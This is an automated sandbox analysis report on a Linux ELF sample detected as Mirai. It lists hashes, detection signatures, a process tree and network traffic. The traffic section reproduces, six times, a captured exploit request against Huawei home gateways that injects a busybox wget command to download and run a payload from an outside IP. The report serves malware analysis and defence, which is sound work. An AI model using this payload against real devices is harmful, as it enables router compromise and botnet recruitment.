Loading ...

Play interactive tourEdit tour

Linux Analysis Report gHQh80mu53

Overview

General Information

Sample Name:gHQh80mu53
Analysis ID:486072
MD5:0f4e92700880c6ea0cd28f259a8bb580
SHA1:537f7aa634b8018a701d5d92fdd167f189570971
SHA256:85b2f6c0e5abbd6c828c7aeb180b3bdc5076962b12ec1e7e3717204f97f1d786
Tags:32elfmiraimotorola
Infos:

Detection

Mirai
Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Uses known network protocols on non-standard ports
Connects to many ports of the same IP (likely port scanning)
Sample has stripped symbol table
HTTP GET or POST without a user agent
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:486072
Start date:19.09.2021
Start time:22:31:18
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 1s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:gHQh80mu53
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal72.troj.lin@0/2@0/0
Warnings:
Show All
  • Report size exceeded maximum capacity and may have missing network information.

Process Tree

  • system is lnxubuntu20
  • gHQh80mu53 (PID: 5220, Parent: 5108, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/gHQh80mu53
  • systemd New Fork (PID: 5254, Parent: 1)
  • sshd (PID: 5254, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t
  • systemd New Fork (PID: 5257, Parent: 1)
  • sshd (PID: 5257, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
gHQh80mu53JoeSecurity_Mirai_6Yara detected MiraiJoe Security

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus / Scanner detection for submitted sampleShow sources
    Source: gHQh80mu53Avira: detected
    Multi AV Scanner detection for submitted fileShow sources
    Source: gHQh80mu53Virustotal: Detection: 54%Perma Link

    Networking:

    barindex
    Uses known network protocols on non-standard portsShow sources
    Source: unknownNetwork traffic detected: HTTP traffic on port 49118 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58958 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42746 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58958 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42746 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42746 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58958 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42746 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58958 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58912 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 34484 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 34484
    Source: unknownNetwork traffic detected: HTTP traffic on port 58912 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 58912 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 58912 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 58958 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42746 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 48802 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 44940 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 58912 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 51800 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 44614 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 39318 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 39318 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 39318 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 39318 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 47922 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 47922 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 58912 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 58958 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42746 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 47922 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 53242 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 39318 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 56182 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40526 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 47922 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 40526 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 40526 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 40526 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 49644 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 39318 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 47922 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 40526 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 34444 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 36852 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 58912 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 36852 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 36852 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 36852 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 40526 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 36396 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 47922 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 36396 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 36852 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 58958 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 42746 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 45450 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44784 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 45450 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44784 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39318 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 36852 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 45450 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44784 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 56202 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 44784 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 45450 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36546 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 36546 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 45450 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44784 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36546 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 40526 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 36852 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 36546 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 41104 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 59636 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 41104 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 36328 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 59636 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 36546 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 36328 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 47922 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 46244 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 41104 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 36328 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 45038 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 59636 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 58912 -> 5501
    Source: unknownNetwork traffic detected: HTTP traffic on port 45450 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 44784 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36328 -> 37215
    Connects to many ports of the same IP (likely port scanning)Show sources
    Source: global trafficTCP traffic: 186.4.204.27 ports 1,2,3,5,7,37215
    Source: global trafficTCP traffic: 197.253.95.77 ports 1,2,3,5,7,37215
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 2e 31 39 39 2e 31 33 30 2e 32 34 37 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 5.199.130.247 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
